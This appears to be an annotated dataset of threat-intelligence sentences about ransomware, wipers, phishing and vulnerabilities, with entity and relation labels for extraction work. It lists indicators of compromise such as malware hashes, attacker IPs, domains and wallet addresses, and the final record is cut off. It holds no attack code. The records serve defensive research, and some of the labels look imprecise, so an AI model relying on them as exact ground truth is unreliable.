{"id":105,"text":"For example, we found that Conti operators use the cloud storage synchronization tool Rclone to upload files to the Mega cloud storage service.","entities":[{"id":377,"label":"malware","start_offset":116,"end_offset":120},{"id":44599,"label":"threat-actor","start_offset":27,"end_offset":42},{"id":44600,"label":"tools","start_offset":86,"end_offset":92},{"id":44601,"label":"SOFTWARE","start_offset":116,"end_offset":142}],"relations":[{"id":1,"from_id":44599,"to_id":44600,"type":"uses"},{"id":2,"from_id":44600,"to_id":44601,"type":"exfiltrates-to"},{"id":3,"from_id":44599,"to_id":44601,"type":"exfiltrates-to"}],"Comments":[]} {"id":106,"text":"Similarly, DarkSide operators used Mega client for exfiltrating files to cloud storage, 7-Zip for archiving, and PuTTY application for network file transfers.","entities":[{"id":45834,"label":"threat-actor","start_offset":11,"end_offset":29},{"id":45835,"label":"tools","start_offset":35,"end_offset":46},{"id":45836,"label":"tools","start_offset":88,"end_offset":93},{"id":45837,"label":"tools","start_offset":113,"end_offset":118}],"relations":[{"id":120,"from_id":45834,"to_id":45835,"type":"uses"},{"id":121,"from_id":45834,"to_id":45836,"type":"uses"},{"id":122,"from_id":45834,"to_id":45837,"type":"uses"}],"Comments":[]} {"id":187,"text":"On Feb. 23, a new variant of wiper malware named HermeticWiper was discovered in Ukraine.","entities":[{"id":591,"label":"malware","start_offset":29,"end_offset":34},{"id":45853,"label":"TIME","start_offset":3,"end_offset":10},{"id":45855,"label":"malware","start_offset":49,"end_offset":62},{"id":45854,"label":"location","start_offset":81,"end_offset":88}],"relations":[{"id":123,"from_id":45855,"to_id":591,"type":"variant-of"},{"id":124,"from_id":45855,"to_id":45854,"type":"targets"}],"Comments":[]} {"id":194,"text":"This post was substantially updated March 31 to add information on phishing and scam attacks, cybersquatting trends, fake donation websites, DoS attacks on Ukrainian news sites and distribution of malicious binaries.","entities":[{"id":45871,"label":"attack-pattern","start_offset":94,"end_offset":108},{"id":45872,"label":"attack-pattern","start_offset":117,"end_offset":139},{"id":45873,"label":"attack-pattern","start_offset":141,"end_offset":152},{"id":45869,"label":"TIME","start_offset":36,"end_offset":44},{"id":45874,"label":"identity","start_offset":156,"end_offset":176},{"id":45875,"label":"attack-pattern","start_offset":181,"end_offset":215},{"id":45870,"label":"attack-pattern","start_offset":67,"end_offset":92}],"relations":[{"id":127,"from_id":45872,"to_id":45874,"type":"duplicate-of"},{"id":129,"from_id":45875,"to_id":45874,"type":"targets"},{"id":128,"from_id":45873,"to_id":45874,"type":"targets"},{"id":126,"from_id":45871,"to_id":45874,"type":"targets"},{"id":125,"from_id":45870,"to_id":45874,"type":"targets"}],"Comments":[]} {"id":196,"text":" DDoS Attacks Impacting Ukrainian Government and Banking Institutions HermeticWiper Malware Website Defacement Rise in Phishing and Scam Attacks Increase in Cybersquatting Trends Fake Donation Websites DoS Attacks on Ukrainian News Sites Distribution of Apps How Palo Alto Networks Is Working to Keep You Safe How You Should Prepare for an Increase in Cyberthreats Such as Wipers, DDoS, Website Defacement and Other Related Attacks How Unit 42 Threat Intelligence and Security Consulting Can Help Additional Cybersecurity Resources Indicators of Compromise","entities":[{"id":45877,"label":"attack-pattern","start_offset":1,"end_offset":13},{"id":45879,"label":"attack-pattern","start_offset":84,"end_offset":109},{"id":45885,"label":"attack-pattern","start_offset":238,"end_offset":258},{"id":45889,"label":"attack-pattern","start_offset":387,"end_offset":405},{"id":45891,"label":"identity","start_offset":436,"end_offset":443},{"id":45876,"label":"malware","start_offset":70,"end_offset":83},{"id":45878,"label":"identity","start_offset":24,"end_offset":69},{"id":45880,"label":"attack-pattern","start_offset":119,"end_offset":144},{"id":45881,"label":"attack-pattern","start_offset":157,"end_offset":171},{"id":45882,"label":"attack-pattern","start_offset":179,"end_offset":201},{"id":45883,"label":"attack-pattern","start_offset":202,"end_offset":213},{"id":45884,"label":"identity","start_offset":217,"end_offset":237},{"id":45886,"label":"identity","start_offset":263,"end_offset":281},{"id":45887,"label":"attack-pattern","start_offset":373,"end_offset":379},{"id":45888,"label":"attack-pattern","start_offset":381,"end_offset":385}],"relations":[{"id":130,"from_id":45877,"to_id":45878,"type":"targets"}],"Comments":[]} {"id":204,"text":" On Feb. 18, both the United States and the United Kingdom attributed these DDoS attacks to Russia’s Main Intelligence Directorate (GRU). Over the past week, Ukraine has continued to observe a relatively constant flow of DDoS attacks targeting its government and financial institutions.","entities":[{"id":44621,"label":"identity","start_offset":22,"end_offset":35},{"id":44622,"label":"TIME","start_offset":4,"end_offset":11},{"id":44623,"label":"identity","start_offset":44,"end_offset":58},{"id":44624,"label":"attack-pattern","start_offset":76,"end_offset":80},{"id":44625,"label":"threat-actor","start_offset":92,"end_offset":136},{"id":44626,"label":"identity","start_offset":159,"end_offset":166},{"id":44627,"label":"attack-pattern","start_offset":222,"end_offset":234},{"id":44628,"label":"identity","start_offset":249,"end_offset":286}],"relations":[{"id":4,"from_id":44624,"to_id":44625,"type":"attributed-to"},{"id":131,"from_id":44627,"to_id":44628,"type":"targets"}],"Comments":[]} {"id":207,"text":"On Feb. 23, a malicious file named conhosts._exe (SHA256: 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591) was uploaded to a public malware repository from an organization in Kyiv, Ukraine.","entities":[{"id":678,"label":"SHA2","start_offset":58,"end_offset":122},{"id":44630,"label":"location","start_offset":192,"end_offset":205},{"id":44631,"label":"FILEPATH","start_offset":35,"end_offset":48},{"id":44632,"label":"TIME","start_offset":3,"end_offset":10}],"relations":[{"id":133,"from_id":678,"to_id":44631,"type":"indicates"}],"Comments":[]} {"id":213,"text":"In tracking this threat, early reports show that the malware has been deployed against a financial institution in Ukraine as well as two contractors in Latvia and Lithuania that provide services to the Ukrainian Government.","entities":[{"id":44633,"label":"location","start_offset":114,"end_offset":121},{"id":44634,"label":"identity","start_offset":202,"end_offset":222},{"id":44635,"label":"identity","start_offset":90,"end_offset":110},{"id":44636,"label":"location","start_offset":152,"end_offset":158},{"id":44637,"label":"location","start_offset":163,"end_offset":172},{"id":44638,"label":"malware","start_offset":53,"end_offset":60},{"id":44639,"label":"identity","start_offset":133,"end_offset":172}],"relations":[{"id":6,"from_id":44638,"to_id":44635,"type":"targets"},{"id":7,"from_id":44638,"to_id":44639,"type":"targets"}],"Comments":[]} {"id":226,"text":"On March 16 while ingesting a third-party data feed, our in-house machine learning models detected a phishing webpage targeting a Ukrainian state administration employee.","entities":[{"id":756,"label":"attack-pattern","start_offset":101,"end_offset":109},{"id":45928,"label":"TIME","start_offset":3,"end_offset":11},{"id":45929,"label":"identity","start_offset":130,"end_offset":169}],"relations":[{"id":134,"from_id":756,"to_id":45929,"type":"targets"}],"Comments":[]} {"id":231,"text":"A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.","entities":[{"id":765,"label":"attack-pattern","start_offset":2,"end_offset":10},{"id":771,"label":"attack-pattern","start_offset":193,"end_offset":201},{"id":44647,"label":"identity","start_offset":31,"end_offset":70},{"id":44648,"label":"TIME","start_offset":124,"end_offset":132},{"id":44649,"label":"identity","start_offset":146,"end_offset":164},{"id":44650,"label":"location","start_offset":315,"end_offset":322}],"relations":[{"id":135,"from_id":765,"to_id":44647,"type":"targets"},{"id":136,"from_id":771,"to_id":44650,"type":"targets"}],"Comments":[]} {"id":234,"text":" We monitored a list of 50 legitimate Ukraine-related domains (e.g., popular news and donation websites) and keywords (e.g., Ukraine, refugee) as targets for cybersquatting.","entities":[{"id":45781,"label":"location","start_offset":125,"end_offset":132},{"id":45934,"label":"location","start_offset":38,"end_offset":45},{"id":44651,"label":"attack-pattern","start_offset":158,"end_offset":172}],"relations":[{"id":137,"from_id":44651,"to_id":45781,"type":"targets"}],"Comments":[]} {"id":244,"text":"For instance, donatetoukraine[.]com is pretending to be associated with the popular Come Back Alive campaign.","entities":[{"id":45942,"label":"DOMAIN","start_offset":14,"end_offset":35},{"id":45943,"label":"campaign","start_offset":84,"end_offset":108}],"relations":[{"id":138,"from_id":45942,"to_id":45943,"type":"related-to"}],"Comments":[]} {"id":246,"text":" We found a cybersquatting domain – save-russia[.]today – that is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44652,"label":"attack-pattern","start_offset":13,"end_offset":27},{"id":44653,"label":"DOMAIN","start_offset":37,"end_offset":56},{"id":44654,"label":"attack-pattern","start_offset":77,"end_offset":88},{"id":44655,"label":"identity","start_offset":92,"end_offset":112}],"relations":[{"id":8,"from_id":44653,"to_id":44655,"type":"targets"},{"id":112,"from_id":44652,"to_id":44653,"type":"uses"},{"id":113,"from_id":44654,"to_id":44653,"type":"uses"}],"Comments":[]} {"id":249,"text":"A cybersquatting domain save-russia[.]today is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44656,"label":"attack-pattern","start_offset":2,"end_offset":16},{"id":44657,"label":"DOMAIN","start_offset":24,"end_offset":43},{"id":44658,"label":"attack-pattern","start_offset":57,"end_offset":68},{"id":44659,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":9,"from_id":44658,"to_id":44659,"type":"targets"},{"id":114,"from_id":44656,"to_id":44657,"type":"uses"},{"id":115,"from_id":44658,"to_id":44657,"type":"uses"}],"Comments":[]} {"id":273,"text":"Our Threat Prevention and Web Application and API Security products added coverage for the OctoberCMS vulnerability exploited in the WhisperGate attacks, and we released an XSOAR Playbook to help organizations hunt for this threat.","entities":[{"id":906,"label":"malware","start_offset":133,"end_offset":144},{"id":44671,"label":"campaign","start_offset":133,"end_offset":152},{"id":44672,"label":"SOFTWARE","start_offset":173,"end_offset":178},{"id":44670,"label":"vulnerability","start_offset":91,"end_offset":115}],"relations":[{"id":10,"from_id":44671,"to_id":44670,"type":"delivers"}],"Comments":[]} {"id":287,"text":" Threat Brief: Ongoing Russia and Ukraine Cyber Conflict (Jan. 20) Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)","entities":[{"id":965,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":966,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":51805,"label":"TIME","start_offset":58,"end_offset":65},{"id":51806,"label":"TIME","start_offset":151,"end_offset":158},{"id":45982,"label":"location","start_offset":23,"end_offset":29},{"id":45983,"label":"location","start_offset":34,"end_offset":41},{"id":45981,"label":"location","start_offset":67,"end_offset":74}],"relations":[{"id":139,"from_id":965,"to_id":966,"type":"duplicate-of"},{"id":141,"from_id":966,"to_id":45981,"type":"originates-from"},{"id":140,"from_id":965,"to_id":45981,"type":"originates-from"}],"Comments":[]} {"id":288,"text":"Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot Threat Briefing: Protecting Against Russia-Ukraine Cyber Activity Palo Alto Networks Resource Page: Protect Against Russia-Ukraine Cyber Activity Cortex XDR Protections Against Malware Associated with Ukraine and Russia Cyber Activity","entities":[{"id":970,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":974,"label":"malware","start_offset":94,"end_offset":102},{"id":976,"label":"malware","start_offset":122,"end_offset":130},{"id":977,"label":"location","start_offset":167,"end_offset":173},{"id":978,"label":"location","start_offset":174,"end_offset":181},{"id":979,"label":"identity","start_offset":197,"end_offset":215},{"id":981,"label":"location","start_offset":247,"end_offset":253},{"id":982,"label":"location","start_offset":254,"end_offset":261},{"id":983,"label":"tools","start_offset":277,"end_offset":287},{"id":44679,"label":"identity","start_offset":30,"end_offset":54},{"id":44678,"label":"location","start_offset":47,"end_offset":54},{"id":44685,"label":"location","start_offset":332,"end_offset":339},{"id":44686,"label":"location","start_offset":344,"end_offset":350}],"relations":[{"id":116,"from_id":970,"to_id":44679,"type":"targets"},{"id":118,"from_id":974,"to_id":970,"type":"uses"},{"id":119,"from_id":976,"to_id":970,"type":"uses"},{"id":117,"from_id":974,"to_id":44679,"type":"targets"}],"Comments":[]} {"id":304,"text":"Last Tuesday, Trusteer reported that a new variant of Citadel, which has long relied on VNC to give attackers remote control over systems, began adding new credentials to systems it infects and enabling the standard Windows remote desktop application (RDP).","entities":[{"id":1035,"label":"malware","start_offset":54,"end_offset":61},{"id":46000,"label":"tools","start_offset":88,"end_offset":91},{"id":46001,"label":"tools","start_offset":216,"end_offset":256},{"id":46002,"label":"identity","start_offset":14,"end_offset":22},{"id":46003,"label":"TIME","start_offset":0,"end_offset":12}],"relations":[{"id":142,"from_id":1035,"to_id":46000,"type":"uses"},{"id":143,"from_id":1035,"to_id":46001,"type":"uses"}],"Comments":[]} {"id":324,"text":"The latest development in the ransomware world is CryptoWall 2.0, a new version of this malware family that uses the Tor network for command and control.","entities":[{"id":44699,"label":"malware","start_offset":50,"end_offset":64},{"id":44700,"label":"tools","start_offset":117,"end_offset":120}],"relations":[{"id":14,"from_id":44699,"to_id":44700,"type":"uses"}],"Comments":[]} {"id":329,"text":"The attacker holds the key necessary to decrypt the files unless the victim agrees to pay a $500 ransom. Unlike previous versions of CryptoWall, 2.0 communicates with its command and control (C2) server through the Tor anonymization network.","entities":[{"id":46021,"label":"malware","start_offset":134,"end_offset":149},{"id":46022,"label":"tools","start_offset":216,"end_offset":219},{"id":46023,"label":"Infrastucture","start_offset":172,"end_offset":203}],"relations":[{"id":145,"from_id":46021,"to_id":46022,"type":"uses"},{"id":144,"from_id":46021,"to_id":46023,"type":"beacons-to"}],"Comments":[]} {"id":331,"text":"CryptoWall isn’t the only threat that communicates over Tor and if your network doesn’t have an explicit reason to allow anonymization networks, you should consider blocking the application altogether with your firewall.","entities":[{"id":1138,"label":"malware","start_offset":0,"end_offset":10},{"id":1140,"label":"tools","start_offset":56,"end_offset":59}],"relations":[{"id":147,"from_id":1138,"to_id":1140,"type":"uses"}],"Comments":[]} {"id":336,"text":" All of the domains currently resolve to 151.248.115.146, a Russian IP address and have WhoIs records associated with the e-mail address “ladomfichisi1987@mail.ru”.","entities":[{"id":1156,"label":"IPV4","start_offset":41,"end_offset":56},{"id":46025,"label":"location","start_offset":60,"end_offset":67},{"id":44703,"label":"EMAIL","start_offset":138,"end_offset":162}],"relations":[{"id":148,"from_id":1156,"to_id":44703,"type":"related-to"}],"Comments":[]} {"id":338,"text":"If these domains are confiscated or otherwise shut down, CryptoWall instructs the user to download the Tor Browser and access a website (paytordmbdekmizq.onion) that is only accessible over the Tor network. Unlikely some of it’s more flexible competition, CryptoWall only accepts ransom in the form of BitCoin.","entities":[{"id":46026,"label":"malware","start_offset":57,"end_offset":67},{"id":46027,"label":"tools","start_offset":103,"end_offset":114},{"id":46028,"label":"DOMAIN","start_offset":137,"end_offset":159},{"id":46029,"label":"SOFTWARE","start_offset":194,"end_offset":205},{"id":46031,"label":"SOFTWARE","start_offset":303,"end_offset":310},{"id":46030,"label":"malware","start_offset":257,"end_offset":267}],"relations":[{"id":149,"from_id":46026,"to_id":46027,"type":"related-to"},{"id":150,"from_id":46026,"to_id":46028,"type":"related-to"}],"Comments":[]} {"id":345,"text":"On October 19, the Kafeine posted a blog discussing the inclusion of CVE-2014-0556 in the Nuclear Pack exploit kit, which was installing CryptoWall 2.0.","entities":[{"id":44706,"label":"TIME","start_offset":3,"end_offset":13},{"id":44707,"label":"malware","start_offset":137,"end_offset":151},{"id":44708,"label":"vulnerability","start_offset":69,"end_offset":82},{"id":44709,"label":"malware","start_offset":90,"end_offset":114},{"id":44710,"label":"threat-actor","start_offset":19,"end_offset":26}],"relations":[{"id":15,"from_id":44707,"to_id":44708,"type":"exploits"},{"id":16,"from_id":44709,"to_id":44707,"type":"delivers"},{"id":17,"from_id":44710,"to_id":44709,"type":"authored-by"}],"Comments":[]} {"id":347,"text":"The PDF exploits CVE-2013-2729 to download a binary which also installed CryptoWall 2.0.","entities":[{"id":46035,"label":"malware","start_offset":74,"end_offset":88},{"id":46036,"label":"vulnerability","start_offset":18,"end_offset":31}],"relations":[{"id":151,"from_id":46035,"to_id":46036,"type":"exploits"}],"Comments":[]} {"id":350,"text":" To protect against CryptoWall 2.0 we recommend taking the following actions: Adobe Reader Embedded BMP Parsing Integer Overflow Vulnerability CVE-2014-0556 Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46038,"label":"SOFTWARE","start_offset":79,"end_offset":91},{"id":46039,"label":"vulnerability","start_offset":145,"end_offset":158},{"id":46037,"label":"malware","start_offset":20,"end_offset":34},{"id":46041,"label":"vulnerability","start_offset":92,"end_offset":143}],"relations":[{"id":152,"from_id":46037,"to_id":46039,"type":"exploits"}],"Comments":[]} {"id":354,"text":"TrustedSec reports on how attackers were apparently able to glean user credentials from a certain device via the Heartbleed vulnerability and use them to log in via a VPN.","entities":[{"id":44711,"label":"identity","start_offset":0,"end_offset":10},{"id":44712,"label":"vulnerability","start_offset":113,"end_offset":137},{"id":44713,"label":"tools","start_offset":167,"end_offset":170},{"id":44714,"label":"attack-pattern","start_offset":60,"end_offset":82}],"relations":[{"id":18,"from_id":44714,"to_id":44712,"type":"exploits"}],"Comments":[]} {"id":357,"text":" As Heartbleed allows the attacker to scrape memory from the vulnerable device, they can retrieve significant amounts of secret information.","entities":[{"id":44716,"label":"attack-pattern","start_offset":38,"end_offset":51},{"id":44715,"label":"vulnerability","start_offset":4,"end_offset":14}],"relations":[{"id":153,"from_id":44715,"to_id":44716,"type":"targets"}],"Comments":[]} {"id":370,"text":"After analysis of the compromise, Volexity determined the initial foothold was the result of a remote code execution vulnerability in Confluence Server and Data Center.","entities":[{"id":46061,"label":"vulnerability","start_offset":95,"end_offset":130},{"id":46063,"label":"SOFTWARE","start_offset":134,"end_offset":167},{"id":46062,"label":"identity","start_offset":34,"end_offset":42}],"relations":[{"id":154,"from_id":46063,"to_id":46061,"type":"has"}],"Comments":[]} {"id":486,"text":"The vulnerability leaves Android users at risk of falling victim to an Android Toast Overlay attack.","entities":[{"id":44751,"label":"SOFTWARE","start_offset":25,"end_offset":32},{"id":44753,"label":"attack-pattern","start_offset":71,"end_offset":99}],"relations":[{"id":155,"from_id":44753,"to_id":44751,"type":"targets"}],"Comments":[]} {"id":513,"text":"Virlock has the largest number of variants due to its file-infector-like behavior.","entities":[{"id":46145,"label":"attack-pattern","start_offset":54,"end_offset":81},{"id":44760,"label":"malware","start_offset":0,"end_offset":7}],"relations":[{"id":159,"from_id":44760,"to_id":46145,"type":"uses"}],"Comments":[]} {"id":532,"text":"One example here is Makop, contained in a 7z archive along with an infostealer malware (SHA256: DE6DFA018773E07C218EF1DF62CE0D99A708841BF1DDFB4C6AD7E323D5D666A4).","entities":[{"id":1760,"label":"malware","start_offset":67,"end_offset":78},{"id":1761,"label":"SHA2","start_offset":96,"end_offset":160},{"id":46154,"label":"tools","start_offset":42,"end_offset":44}],"relations":[{"id":156,"from_id":1761,"to_id":1760,"type":"related-to"}],"Comments":[]} {"id":534,"text":"For example, GandCrab uses JScript as a downloader, leveraging Windows Background Intelligent Transfer Service (BITS) to download the payload in the background (Figure 5).","entities":[{"id":44765,"label":"malware","start_offset":13,"end_offset":21},{"id":44766,"label":"tools","start_offset":63,"end_offset":117}],"relations":[{"id":20,"from_id":44765,"to_id":44766,"type":"uses"}],"Comments":[]} {"id":535,"text":"We also observed that Mailto (AKA NetWalker) tends to deliver ransomware in a highly obfuscated PowerShell script.","entities":[{"id":1765,"label":"malware","start_offset":22,"end_offset":28},{"id":1766,"label":"malware","start_offset":34,"end_offset":43},{"id":46155,"label":"attack-pattern","start_offset":78,"end_offset":113}],"relations":[{"id":162,"from_id":1766,"to_id":1765,"type":"duplicate-of"},{"id":160,"from_id":46155,"to_id":1766,"type":"delivers"},{"id":161,"from_id":46155,"to_id":1765,"type":"delivers"}],"Comments":[]} {"id":537,"text":"One example is an exploit RTF that led to downloading and installing Makop ransomware remotely.","entities":[{"id":44767,"label":"attack-pattern","start_offset":18,"end_offset":29},{"id":44768,"label":"malware","start_offset":69,"end_offset":85}],"relations":[{"id":21,"from_id":44767,"to_id":44768,"type":"delivers"}],"Comments":[]} {"id":554,"text":"For example, the Xorist ransomware (SHA256: 4979A10B81C41ECC0FC3A0F376ADE766CE616D2301639F74E0277047CC40E3D6) demanded £1,000 for a ransom; the bitcoin wallet address was 1BFqrLCDwwrxueY7FFDn8DqeoasPJignxt.","entities":[{"id":1837,"label":"SHA2","start_offset":44,"end_offset":108},{"id":46168,"label":"malware","start_offset":17,"end_offset":34},{"id":46169,"label":"SOFTWARE","start_offset":144,"end_offset":151}],"relations":[{"id":157,"from_id":1837,"to_id":46168,"type":"indicates"}],"Comments":[]} {"id":558,"text":"During the operation, 25.1 BTC from 538 wallets was sent to 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s (SHA256: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953), which is a wallet owned by Binance cryptocurrency exchange.","entities":[{"id":1845,"label":"SHA2","start_offset":104,"end_offset":168},{"id":44776,"label":"identity","start_offset":198,"end_offset":229}],"relations":[{"id":164,"from_id":44776,"to_id":1845,"type":"owns"}],"Comments":[]} {"id":564,"text":"After infection, Virlock hides the file extension through modification of the registry (HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt = 1, HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden = 2).","entities":[{"id":1874,"label":"REGISTRYKEY","start_offset":88,"end_offset":164},{"id":1876,"label":"REGISTRYKEY","start_offset":170,"end_offset":241},{"id":44778,"label":"malware","start_offset":17,"end_offset":24}],"relations":[{"id":165,"from_id":1874,"to_id":44778,"type":"indicates"},{"id":166,"from_id":1876,"to_id":44778,"type":"indicates"}],"Comments":[]} {"id":573,"text":" Ryuk will change the infected file extension to .RYK, and leave a ransom note called RyukReadMe.html.","entities":[{"id":44783,"label":"malware","start_offset":1,"end_offset":5},{"id":44784,"label":"FILEPATH","start_offset":86,"end_offset":101}],"relations":[{"id":22,"from_id":44784,"to_id":44783,"type":"indicates"}],"Comments":[]} {"id":600,"text":" The attackers behind Hancitor aren’t the first to time their spam attacks like this, but it is an effective tactic to try and increase their chances of success, especially when combined with the other innovation that we’ve seen.","entities":[{"id":44791,"label":"malware","start_offset":22,"end_offset":30},{"id":44792,"label":"attack-pattern","start_offset":62,"end_offset":74}],"relations":[{"id":23,"from_id":44791,"to_id":44792,"type":"uses"}],"Comments":[]} {"id":602,"text":"In the past, Hancitor was sent as a malicious attachment in a spam email which would then download and install the attackers’ final malware like a banking Trojan.","entities":[{"id":46195,"label":"malware","start_offset":13,"end_offset":21},{"id":46196,"label":"attack-pattern","start_offset":36,"end_offset":72}],"relations":[{"id":167,"from_id":46195,"to_id":46196,"type":"uses"}],"Comments":[]} {"id":606,"text":"The spam the attackers use no long has a malicious attachment but instead a malicious link that downloads the malicious Hancitor attachment.","entities":[{"id":44794,"label":"malware","start_offset":120,"end_offset":128},{"id":44795,"label":"attack-pattern","start_offset":76,"end_offset":91},{"id":44796,"label":"attack-pattern","start_offset":41,"end_offset":61}],"relations":[{"id":24,"from_id":44796,"to_id":44794,"type":"delivers"},{"id":25,"from_id":44795,"to_id":44794,"type":"delivers"}],"Comments":[]} {"id":613,"text":"The hot spots in the United States represents distribution servers which are created using fraud based accounts at various hosting providers that are hosting the Hancitor documents while the hotspots in Asia represent legitimate sites for small and medium businesses that have been compromised by the actors behind Hancitor campaign to host the malicious Hancitor documents.","entities":[{"id":46207,"label":"malware","start_offset":162,"end_offset":170},{"id":46208,"label":"location","start_offset":203,"end_offset":207},{"id":46206,"label":"location","start_offset":21,"end_offset":34},{"id":46210,"label":"campaign","start_offset":315,"end_offset":332},{"id":46211,"label":"malware","start_offset":355,"end_offset":363}],"relations":[{"id":168,"from_id":46207,"to_id":46206,"type":"targets"},{"id":169,"from_id":46207,"to_id":46208,"type":"targets"}],"Comments":[]} {"id":621,"text":"This post is also available in: 日本語 (Japanese) This Unit 42 blog provides an update on the threat situation surrounding attacks using the Petya Ransomware which are impacting organizations in Ukraine, Russia and to a lesser extent around the world.","entities":[{"id":2073,"label":"identity","start_offset":58,"end_offset":65},{"id":2074,"label":"malware","start_offset":144,"end_offset":149},{"id":44803,"label":"malware","start_offset":144,"end_offset":160},{"id":44804,"label":"location","start_offset":198,"end_offset":205},{"id":44805,"label":"location","start_offset":207,"end_offset":213}],"relations":[{"id":27,"from_id":44803,"to_id":44805,"type":"targets"},{"id":26,"from_id":44803,"to_id":44804,"type":"targets"}],"Comments":[]} {"id":634,"text":" The latest version of the Petya ransomware is spreading over Windows SMB and is reportedly using the ETERNALBLUE exploit tool, which exploits CVE-2017-0144 and was originally released by the Shadow Brokers group in April 2017.","entities":[{"id":2111,"label":"malware","start_offset":27,"end_offset":32},{"id":2113,"label":"malware","start_offset":102,"end_offset":113},{"id":2116,"label":"threat-actor","start_offset":188,"end_offset":206},{"id":46221,"label":"SOFTWARE","start_offset":62,"end_offset":73},{"id":46222,"label":"vulnerability","start_offset":143,"end_offset":156},{"id":46223,"label":"TIME","start_offset":216,"end_offset":226}],"relations":[{"id":171,"from_id":2111,"to_id":46222,"type":"exploits"},{"id":170,"from_id":2111,"to_id":46221,"type":"targets"},{"id":172,"from_id":2116,"to_id":2113,"type":"authored-by"},{"id":173,"from_id":46222,"to_id":46221,"type":"targets"}],"Comments":[]} {"id":645,"text":" While we have not been able to directly confirm the source, we have seen evidence that a Ukrainian software application called MEDoc was used by attackers to deliver the Petya DLL.","entities":[{"id":46229,"label":"location","start_offset":90,"end_offset":99},{"id":44817,"label":"SOFTWARE","start_offset":128,"end_offset":133},{"id":44818,"label":"malware","start_offset":171,"end_offset":176}],"relations":[{"id":174,"from_id":44818,"to_id":44817,"type":"uses"}],"Comments":[]} {"id":672,"text":"Despite these measures, users still choose to open these files and enable their content, thus allowing macros to continue be a common attack vector – both in wide and simple attacks to deliver ransomware such as Emotet, as well as for sophisticated attacks like this Sofacy campaign.","entities":[{"id":2220,"label":"malware","start_offset":212,"end_offset":218},{"id":44819,"label":"campaign","start_offset":267,"end_offset":282},{"id":44821,"label":"threat-actor","start_offset":267,"end_offset":273}],"relations":[{"id":175,"from_id":44819,"to_id":44821,"type":"related-to"}],"Comments":[]} {"id":679,"text":"An example for such attack vector being leveraged by attackers is CVE-2018-4878, an Adobe Flash Player Zero-Day exploited by embedding malicious SWF files in Excel documents.","entities":[{"id":46251,"label":"vulnerability","start_offset":66,"end_offset":79},{"id":46252,"label":"SOFTWARE","start_offset":84,"end_offset":102},{"id":46253,"label":"attack-pattern","start_offset":125,"end_offset":173}],"relations":[{"id":176,"from_id":46252,"to_id":46251,"type":"has"},{"id":177,"from_id":46251,"to_id":46253,"type":"uses"}],"Comments":[]} {"id":684,"text":"While still not seen in the wild, similar exploits in Microsoft Equation Editor, such as such as CVE-2018-0807 and CVE-2018-0798, were identified by Unit 42 researchers.","entities":[{"id":2275,"label":"identity","start_offset":149,"end_offset":156},{"id":44827,"label":"SOFTWARE","start_offset":54,"end_offset":79},{"id":44824,"label":"vulnerability","start_offset":97,"end_offset":110},{"id":44825,"label":"vulnerability","start_offset":115,"end_offset":128}],"relations":[{"id":29,"from_id":44827,"to_id":44825,"type":"has"},{"id":28,"from_id":44827,"to_id":44824,"type":"has"}],"Comments":[]} {"id":687,"text":"They can be used to compromise an endpoint in the following way: This functionality was leveraged in exploitation of CVE-2017-0199 - a Microsoft Office\/WordPad remote code execution (RCE) vulnerability patched by Microsoft in September 2017, and was used in multiple campaigns, like this OilRig campaign.","entities":[{"id":2292,"label":"identity","start_offset":136,"end_offset":145},{"id":2293,"label":"tools","start_offset":146,"end_offset":152},{"id":2298,"label":"malware","start_offset":289,"end_offset":295},{"id":44828,"label":"vulnerability","start_offset":118,"end_offset":131},{"id":44830,"label":"campaign","start_offset":289,"end_offset":303},{"id":44829,"label":"TIME","start_offset":227,"end_offset":241},{"id":44831,"label":"tools","start_offset":136,"end_offset":152},{"id":44832,"label":"tools","start_offset":153,"end_offset":160}],"relations":[{"id":30,"from_id":44831,"to_id":44828,"type":"has"},{"id":31,"from_id":44832,"to_id":44828,"type":"has"},{"id":32,"from_id":44830,"to_id":44828,"type":"exploits"}],"Comments":[]} {"id":715,"text":"This post is also available in: 日本語 (Japanese) On Aug. 25, 2021, Atlassian released a security advisory for an injection vulnerability in Confluence Server and Data Center, CVE-2021-26084.","entities":[{"id":46281,"label":"vulnerability","start_offset":179,"end_offset":193},{"id":46282,"label":"SOFTWARE","start_offset":144,"end_offset":177},{"id":46279,"label":"identity","start_offset":71,"end_offset":80},{"id":46280,"label":"TIME","start_offset":56,"end_offset":69}],"relations":[{"id":178,"from_id":46282,"to_id":46281,"type":"has"}],"Comments":[]} {"id":719,"text":" The Atlassian products vulnerable to CVE-2021-26084 are those using the following versions of Confluence Server and Data Center: Confluence Cloud customers are not affected by this vulnerability.","entities":[{"id":46287,"label":"identity","start_offset":5,"end_offset":14},{"id":46288,"label":"vulnerability","start_offset":38,"end_offset":52},{"id":46290,"label":"SOFTWARE","start_offset":131,"end_offset":147},{"id":46289,"label":"SOFTWARE","start_offset":95,"end_offset":128}],"relations":[{"id":180,"from_id":46289,"to_id":46288,"type":"has"}],"Comments":[]} {"id":736,"text":"Dubbed OMIGOD, the four vulnerabilities were found to directly affect Azure Cloud Instances.","entities":[{"id":46327,"label":"vulnerability","start_offset":7,"end_offset":13},{"id":46328,"label":"SOFTWARE","start_offset":70,"end_offset":81}],"relations":[{"id":181,"from_id":46328,"to_id":46327,"type":"has"}],"Comments":[]} {"id":803,"text":"Stolen credentials underpin some of the most critical and damaging attacks out there; both Shamoon 2 and the Sofacy threat actor group, for example, have made detailed use of credential 